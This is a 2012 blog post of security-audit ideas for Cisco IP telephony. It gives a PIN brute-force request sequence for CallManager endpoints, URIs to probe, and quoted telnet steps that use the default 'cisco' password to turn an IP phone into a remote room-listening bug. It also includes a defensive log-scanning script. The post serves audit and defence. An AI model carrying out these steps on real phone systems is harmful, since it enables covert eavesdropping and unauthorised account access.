14 Oct 2012

Cisco IP Telephony security auditing ideas

Here are some ideas for security auditing a Cisco IP Telephony solution.

Password Auditing

Web UI

Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/showHome.do

IP phone PIN 

A programmatic test of the phone PIN would follow the approach described here: http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

NB: I haven't done that test automatically to avoid problems (in Prod) but I think that the clean sequence required looks like this:
  • Get SIDVAL: /ccmpd/pdCheckLogin.do?name=undefined 
  • Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/login.do?sid=SIDVAL&userid=USERID&pin=PIN
  • Initiate logout: /ccmpd/pdLogoutPage.do?sid=SIDVAL
  • Confirm logout and close session: /ccmpd/logout.do?sid=SIDVAL
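
For the defensive side of this sequence, here is an added example (not from the original post) that scans web access logs for two patterns: one client trying many user IDs at /ccmpd/login.do, and sessions that were opened but never closed via /ccmpd/logout.do. The common-log-format layout, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (common log format is an assumption; PIN values are placeholders).
SAMPLE_LOG = """\
198.51.100.7 - - [14/Oct/2012:10:00:01 +0000] "GET /ccmpd/pdCheckLogin.do?name=undefined HTTP/1.1" 200 310
198.51.100.7 - - [14/Oct/2012:10:00:02 +0000] "GET /ccmpd/login.do?sid=S1&userid=alice&pin=PIN HTTP/1.1" 200 120
198.51.100.7 - - [14/Oct/2012:10:00:03 +0000] "GET /ccmpd/login.do?sid=S2&userid=bob&pin=PIN HTTP/1.1" 200 120
198.51.100.7 - - [14/Oct/2012:10:00:04 +0000] "GET /ccmpd/login.do?sid=S3&userid=carol&pin=PIN HTTP/1.1" 200 120
198.51.100.7 - - [14/Oct/2012:10:00:05 +0000] "GET /ccmpd/logout.do?sid=S3 HTTP/1.1" 200 90
203.0.113.20 - - [14/Oct/2012:10:05:00 +0000] "GET /ccmpd/login.do?sid=S9&userid=dave&pin=PIN HTTP/1.1" 200 120
203.0.113.20 - - [14/Oct/2012:10:09:00 +0000] "GET /ccmpd/logout.do?sid=S9 HTTP/1.1" 200 90
"""

# client address, then the request target inside the quoted request line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def summarize(log_text):
    """Per client: user IDs tried at /ccmpd/login.do and session IDs never closed."""
    users, opened, closed = defaultdict(set), defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        client, target = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query)
        sid = qs.get("sid", [None])[0]
        if url.path == "/ccmpd/login.do":
            users[client].update(qs.get("userid", []))
            if sid:
                opened[client].add(sid)
        elif url.path == "/ccmpd/logout.do" and sid:
            closed[client].add(sid)
    return {c: {"userids": sorted(users[c]),
                "unclosed_sids": sorted(opened[c] - closed[c])}
            for c in users}

def flag_sweeps(log_text, min_userids=3):
    """Clients that tried at least min_userids distinct user IDs."""
    return sorted(c for c, s in summarize(log_text).items()
                  if len(s["userids"]) >= min_userids)

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
    print(flag_sweeps(SAMPLE_LOG))
```

The same summary is useful after an authorised audit, to confirm that the test closed every session it opened.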

 

Test other URIs used by Cisco IP phone

  • http://.../ccmcip/xmldirectory.jsp 
  • http://.../ccmcip/getservicesmenu.jsp 
  • http://.../ccmcip/GetTelecasterHelpText.jsp 
  • http://.../ccmcip/authenticate.jsp

Check if IP Phones can be used to remotely bug a (conference) room 

Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described here: http://dorkbyte.com/2010/10/31/cisco-ip-phones-lets-you-remotely-bug-a-room/

Excerpt from above reference (in case the above post disappears):
There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

To try this out:
  1. Telnet to the phone (e.g. “telnet 192.0.2.10”). You may need to bridge your PC to the IP Phone VLAN from within the office (see http://www.linuxjournal.com/article/10821?page=0,2, use VLAN as determined from an IP phone's settings, e.g. VLAN 161, IP: 172.16.2.241/255.255.255.127, DHCP server: 172.16.29.10, Host Name: SEPD0C282439930)
  2. Enter the password for the phone. At the “SIP Phone>” prompt, start a “test” session with “test open”
  3. Virtually take the phone off the hook with “test offhook”
  4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666”)
  5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
  6. Listen to the audio streaming from the phone… 
